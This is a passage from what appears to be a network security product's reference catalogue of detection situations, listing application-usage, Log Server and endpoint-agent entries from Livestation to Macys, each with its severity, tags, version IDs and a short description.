Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-630-5211
Description: Livestation is a platform for distributing live television and radio broadcasts over a peer-to-peer data network. It was developed by Skinkers Ltd. based on peer-to-peer technology acquired from Microsoft Research.
Back to top

Livestream

About this situation: livestream usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Livesupporti

About this situation: Application Livesupporti detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveSupporti allows you to add live support chat on your website and chat with your visitors.
Back to top

Livetecs

About this situation: Application Livetecs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Livetecs is a provider of web-based Time and Expense tracking solution for small and medium sized businesses.
Back to top

LiveUAMap

About this situation: LiveUAMap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: LiveUAMap is an information service about conflict in Ukraine.
Back to top

LiveWatch

About this situation: Application LiveWatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveWatch has redefined home security, wireless alarm system that empowers customers with cutting edge protection and control.
Back to top

Livingsocial

About this situation: LivingSocial usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: LivingSocial offers a new deals each day to its members who subscribe via email. Once a deal has been purchased, members are e-mailed their redemption vouchers the following business day.
Back to top

LKQD

About this situation: LKQD usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1764-5242
Description: LKQD usage detected. LKQD is a video advertisement network.
Back to top

Llamasoft

About this situation: Application Llamasoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LLamasoft provides software and expertise to help large organizations design and improve their supply chain network operations.
Back to top

LLMNR

About this situation: Link-Local Multicast Name Resolution (LLMNR) usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1150-5242
Description: LLMNR is used for local name resolution in Windows systems.
Back to top

Load-Impact

About this situation: Application Load-Impact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Load Impact allows all online businesses, regardless of size, budget or technical proficiency, to know what it will take to satisfy customer demand
Back to top

LoadSpring

About this situation: Application LoadSpring detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoadSpring is the company that provides Project Management solutions. It has the Project Management focus and expertise to ensure the right solution.
Back to top

Loadster

About this situation: Application Loadster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loadster helps you simulate a realistic, large volume of users to find bottlenecks, improve reliability, and optimize user experience.
Back to top

LocalBitcoins

About this situation: Application LocalBitcoins detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LocalBitcoins is a service that helps users exchange local currency to bitcoins.
Back to top

Localeze

About this situation: Application Localeze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Localeze, a service of Neustar, is a content manager for local search engines. The company provides businesses with tools to verify and manage the identity of their local listings across the Web. The company works with local search platform partners and location-based service partners, national brands and local business clients
Back to top

Localize

About this situation: Application Localize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Localize helps to translate website. Its platform makes it to manage and edit translations.
Back to top

Localtunnel

About this situation: Localtunnel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-680-5211
Description: Localtunnel allows web developers to test their development websites across multiple devices without the need for public staging servers.
Back to top

Localytics

About this situation: Application Localytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Localytics is a closed-loop app analytics and marketing platform that helps brands acquire, engage, and retain users.
Back to top

Lockerdome

About this situation: Application Lockerdome detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LockerDome is an interest-based social network. LockerDome helps you to personalize the web.
Back to top

LockPath

About this situation: Application LockPath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keylight makes it easier to demonstrate a comprehensive governance, risk management and compliance program.
Back to top

Lodgify

About this situation: Application Lodgify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lodgify is an all-in-one software-as-a-service solution that simplifies vacation rental marketing. The software allows both vacation rental owners and property managers to create their own mobile-friendly website with a Book Now function, manage reservations and availabilities efficiently, and instantly synchronize property information with listings on multiple external vacation rental portals.
Back to top

Log Server restarted on system resource failure.

About this situation: Log Server restarted after system resource failure
Context: Log Server situations
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: Log Server has been restarted after a fatal failure on system resource.
Back to top

Log Server: critical error

About this situation: Log Server: critical error
Context: Log Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The Log Server had a read/write problem. Some process may have locked the file or there may be a disk error. Make sure external programs (virus scanners, backup tools etc.) are configured to skip the log storage files and if the problem persists, contact Stonesoft support.
Back to top

Log Server: disk full

About this situation: Log Server: disk full
Context: Log Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The disk space on the Log Server has dropped below the threshold value set in the Log Server configuration file. Free up space on the Log Server immediately.
Back to top

Log Server: disk is becoming full

About this situation: Log Server: disk is becoming full
Context: Log Server situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The disk space on the Log Server has dropped below three times the threshold value set in the Log Server configuration file.
Back to top

Log Server: log file corrupted

About this situation: Log Server: log file corrupted
Context: Log Server situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Attempt to read from or write to a log file has failed due to an error in the file.
Back to top

Log Server: Log Forward Server Buffer Overflow

About this situation: Log Forward Server Buffer Overflow
Context: Log Server situations
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Description: Log Forward Server is not able to handle all the log forwarded.
Back to top

LogEntries

About this situation: Application LogEntries detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Logentries is a software as a service provider for log management and intelligence, collects and analyzes data found within log files in real-time with a cloud-delivered approach.
Back to top

Loggly

About this situation: Loggly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Loggly helps cloud centric organizations, organizations that build and manage cloud facing applications to solve operational problems faster.
Back to top

LogiAnalytics

About this situation: Application LogiAnalytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogiAnalytics is the company that provides self-service analytics, delivering tools designed for needs of users, IT and product managers.
Back to top

LogicalDOC

About this situation: Application LogicalDOC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogicalDOC is a document management system software easy-to-use, reliable and affordable, which can improve your business efficiency by helping you to find, manage and share documents.
Back to top

Logicalware

About this situation: Application Logicalware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Logicalware MailManager is a cloud-based customer support solution for the efficient management of inbound email and social media enquiries.
Back to top

LogicBox-CRM

About this situation: Application LogicBox-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With LogicBox CRM, we take the standard CRM modules and customize them for your business. Then we incorporate the key processes and workflows that make your business special. The result is a single, integrated system that increases operational efficiency and streamlines your business.
Back to top

LogicManager

About this situation: Application LogicManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogicManager is an Enterprise Risk Management ERM software solution.
Back to top

Logicmonitor

About this situation: Application Logicmonitor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogicMonitor is the cloud-based performance monitoring solution that enables companies to easily and cost-effectively monitor their entire IT infrastructure stack.
Back to top

Logikcull

About this situation: Application Logikcull detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Logikcull is a cloud-based discovery platform that empowers enterprises and law firms to bring eDiscovery. It improves legal teams and technical capabilities to organize, search, and collaborate on document collections for discovery and investigations.
Back to top

LoginRadius

About this situation: Application LoginRadius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoginRadius is a customer identity management platform offering customer registration services, profile data storage.
Back to top

Logisticsolutions

About this situation: Application Logisticsolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Logistic Solutions Anywhere is a company created in 2008 and comprised of private capital. Its main objective is the development and marketing of solutions for small and medium enterprises.
Back to top

Logitech Gaming Framework

About this situation: Endpoint Context Agent based Logitech Gaming Framework detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Logitech Gaming Framework endpoint application has been detected. Logitech Gaming Software is used for customizing Logitech peripheral devices.
Back to top

Logitech GHUB

About this situation: Endpoint Context Agent based Logitech GHUB detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Description: Logitech GHUB endpoint application has been detected. Logitech GHUB is used for customizing Logitech peripheral devices.
Back to top

Logitech Updater

About this situation: Endpoint Context Agent based Logitech Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Logitech Updater endpoint application has been detected. The process automatically checks for updates for Logitech peripheral devices.
Back to top

LogMeIn

About this situation: LogMeIn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1764-5242
Description: LogMeIn provides remote connectivity, collaboration and support solutions software.
Back to top

LogMeIn-Rescue

About this situation: LogMeIn Rescue usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows IT helpdesks to provide instant remote support to customers and employees; it has three main components- a Technician Console, a Customer Applet, and an Administration Center. Source: Wikipedia
Back to top

LogoMyWay

About this situation: Application LogoMyWay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogoMyWay is a US based logo design competition service.
Back to top

Logrhythm

About this situation: Application Logrhythm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogRhythm, providing security intelligence and analytics, empowers organizations around the globe to rapidly detect, respond to and neutralize damaging cyber threats.
Back to top

Log_Compress-SIDs

About this situation: Situation repeated multiple times
Context: Log Moderation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-171-2032
Description: The logged situation or event repeated multiple times in short period of time. The repeated situations were compressed.
Back to top

Lokad-CRM

About this situation: Lokad CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Lokalisten

About this situation: Lokalisten usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to connect with friends.
Back to top

LongJump-AgileApps-Live

About this situation: LongJump/AgileApps Live usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Longjump is a now apart of Software AG and named as AgileAppsLive. AgileApps Live is a business process management and application platform-as-a-service that allows the subject matter experts, as well as developers, to visually build and deploy process-driven, application solutions. The AgileApps Live platform empowers business to have a better way to track and manage service requests, respond to incidents and resolve investigations.
Back to top

Lookout

About this situation: Lookout usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Lookout apps include Antivirus Free Lookout for Android and Lookout Mobile Security Free for iOS. Plan B, an application that can be remotely installed to locate lost devices is available on Android. The Antivirus Free edition is upgradeable to a premium version which includes a phishing and malicious website blocker, privacy advisor, photo and call history backup, device to device data transfer, remote locking and wiping, and support services.
Back to top

LookSmart

About this situation: Application LookSmart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LookSmart is an online advertising and technology company that provides advertising solutions for advertisers and publishers. LookSmart offers an unparalleled customer experience to advertisers of any size budget, offering them extensive reach into audiences through a monitored distribution network, maximizing ROI. LookSmart offers publishers hosted, white label ad serving technology to command and control their advertising revenue.
Back to top

LookSmart-PublisherCenter

About this situation: Application LookSmart-PublisherCenter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LookSmart Publisher Solutions, you can access thousands of advertisers and monetize your site traffic. Grow your audience with white label solutions or sell Pay-Per-Click ads directly to your advertisers for greater yields and inventory control.
Back to top

Loom

About this situation: Application Loom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loom is a personal photo and video cloud storage solution.
Back to top

Loop11

About this situation: Loop11 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Loop 11 is a remote usability testing tool, enabling you to test the user-experience of any website.
Back to top

LoopFuse

About this situation: Application LoopFuse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoopFuse is now part of Salesfusion building the next generation of marketing automation software.
Back to top

Loopia-AB

About this situation: Application Loopia-AB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loopia AB is a stable hosting company that also helps you to register domain names at low cost, as .se, .com, .nu and .eu.
Back to top

Loopline-Systems

About this situation: Application Loopline-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loopline Systems is a company with focus on enabling a data-driven, approach to human resources.
Back to top

LoopNet

About this situation: Application LoopNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoopNet operates heavily trafficked commercial real estate marketplace online with more than 7 million registered members and 5 million unique monthly visitors.
Back to top

Loopster

About this situation: Application Loopster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loopster video editing platform for business owner's education programs and individual personal use.
Back to top

LoopUP

About this situation: Application LoopUP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoopUp allow invite, join, control and share your screen, experience audio and web conferencing without the pain of normal conference calls.
Back to top

Loring-Ward

About this situation: Application Loring-Ward detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Loring Ward provides Investment and Business Management and Practice Development to independent Financial Advisors and their clients.
Back to top

Lose-It

About this situation: Application Lose-It detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lose It
Back to top

Lotus-Greenhouse

About this situation: Application Lotus-Greenhouse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBM Lotus Greenhouse is the community driving social business software.
Back to top

Lotus-Notes-Webmail

About this situation: Lotus Notes Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-595-5211
Description: Lotus Notes Webmail usage has been detected.
Back to top

Lotuslive

About this situation: LotusLive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: These services allow users to share files, conduct online meetings, access email, send instant messages, and create data visualizations. Source: Wikipedia
Back to top

Louisville-Slugger-B2B-Store

About this situation: Application Louisville-Slugger-B2B-Store detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Louisville Slugger is brand in baseball and softball. Online store.
Back to top

Love-money

About this situation: Application Love-money detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lovemoney - is a personal finance site that provides expert help, intelligent discussion areas and market leading comparison tools.
Back to top

Lovelog

About this situation: Lovelog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

LOYAL3

About this situation: Application LOYAL3 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LOYAL3 is an investing platform that connects brands and consumers through stock ownership.
Back to top

LoyaltyLion

About this situation: Application LoyaltyLion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LoyaltyLion- is a digital framework that gives ecommerce stores innovative ways to engage and retain customers.
Back to top

LPD

About this situation: Line Printer Daemon protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Description: The Line Printer Daemon protocol is a protocol for controlling printing over network.
Back to top

Lsass.exe

About this situation: Endpoint Context Agent based lsass.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process lsass.exe was detected. Lsass.exe is a Local Security Authority Process used by Microsoft Windows.
Back to top

LSE-Careers

About this situation: Application LSE-Careers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LSE Careers are recruiting a small team of current students to help with our annual graduate destinations survey.
Back to top

LSI

About this situation: Application LSI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LSI, an Avago Technologies Company, designs semiconductors and software that accelerate storage and networking in datacenters, mobile networks and client computing.
Back to top

Lucidchart

About this situation: Lucidchart usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Lucidchart is a web-based diagramming software which allows users to collaborate and work together in real time to create flowcharts, organisational charts, website wireframes, UML designs, mind maps, software prototypes, and many other diagram types. Built on web standards such as HTML5 and JavaScript, Lucidchart is supported in all modern web browsers like Google Chrome, Firefox, Safari and Internet Explorer 8 plus.
Back to top

Lucidpress

About this situation: Application Lucidpress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lucidpress is a web-based drag and drop publishing app, enabling anyone to create stunning content for print and digital.
Back to top

LuckyOrange

About this situation: Application LuckyOrange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lucky Orange is tool that lets you quickly see who is on site and interact with them in many ways. With Lucky Orange, chat with visitors on site, actually watch their mouse move around the screen and click in real time, play them back as recording, generate beautiful heat maps of clicks, mouse movements
Back to top

Lulu

About this situation: Application Lulu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lulu is a provider of self-publishing, printing, and distribution services.
Back to top

Lumapps

About this situation: Application Lumapps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: LumApps
Back to top

Lumenate

About this situation: Application Lumenate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lumenate is a technical consulting firm focused on enabling and securing the virtualized enterprise.
Back to top

Lumension

About this situation: Application Lumension detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lumension Security, Inc., provide endpoint management and security, develops, integrates and markets security software solutions that help businesses protect their vital information and manage critical risk across network and endpoint assets.
Back to top

Lumesse-TalentLink

About this situation: Application Lumesse-TalentLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lumesse TalentLink improves recruitment efficiency for customers of all types and sizes.
Back to top

LumoFlow-for-Sales

About this situation: Application LumoFlow-for-Sales detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LumoFlow combines agile group work, social networking and content management tools into simple easy-to-use service.Instead of internal pipeline reporting LumoFlow gives the sharp focus on customer's challenges, requirements and sales opportunity management. This approach has led us to create the most tools for consultative and challenging sales.
Back to top

Lumosity

About this situation: Application Lumosity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lumosity is an online brain training and neuroscience research company. Lumosity consists of games claiming to improve memory, attention, flexibility, speed of processing, and problem solving.
Back to top

Lunacloud

About this situation: Application Lunacloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lunacloud is cloud infrastructure services provider (IaaS) to run your operating system, applications or store data.
Back to top

LunaPic

About this situation: Application LunaPic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lunapic is an online photo editor with photo, scketch and paint effects.
Back to top

Lunarpages

About this situation: Application Lunarpages detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lunarpages provides web hosting configurations from basic web hosting to more advanced hosting solutions such as private cloud hosting, complete IT infrastructure, disaster recovery and business continuity solutions.
Back to top

Luxor-CRM

About this situation: Luxor CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Lynda

About this situation: Lynda usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Description: Lynda is a service providing online courses about various topics.
Back to top

Lynkos-CRM

About this situation: Application Lynkos-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lynkos CRM for small and medium business for manage sales and customer service Integrated to Google Apps.
Back to top

Lynuxworks

About this situation: Application Lynuxworks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lynx Software Technologies provide military-grade security in both our LynxOS RTOS and LynxSecure separation kernel hypervisor, giving a secure foundation for this new generation of connected embedded devices.
Back to top

M-Files

About this situation: Application M-Files detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: M-Files Enterprise Information Management (EIM) helps enterprises find, share, and secure documents and information.
Back to top

M3V-Software

About this situation: Application M3V-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: M3V Software lets to assign tasks and monitor completion of EHS related activities, escalate issues to urgent when uncompleted tasks approach a deadline.
Back to top

Mac-Forums

About this situation: Application Mac-Forums detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mac Forums is a discussion forum for Mac, Apple, iPhone, iPad and iPod related topics. Find great Windows to Apple switchover questions and answers as well.
Back to top

Machi-Bbs

About this situation: Machi-BBS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Machi-BBS is a Japanese bulletin board that allows users to post public messages to announce events, advertise, or provide information.
Back to top

MacKeeper

About this situation: Application MacKeeper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MacKeeper is a utility software suite for macOS that has tools for cleaning, security, and optimization.
Back to top

MacPorts

About this situation: MacPorts usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-595-5211
Description: MacPorts is an open source application repository for Apple Mac OS X.
Back to top

Macys

About this situation: Application Macys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
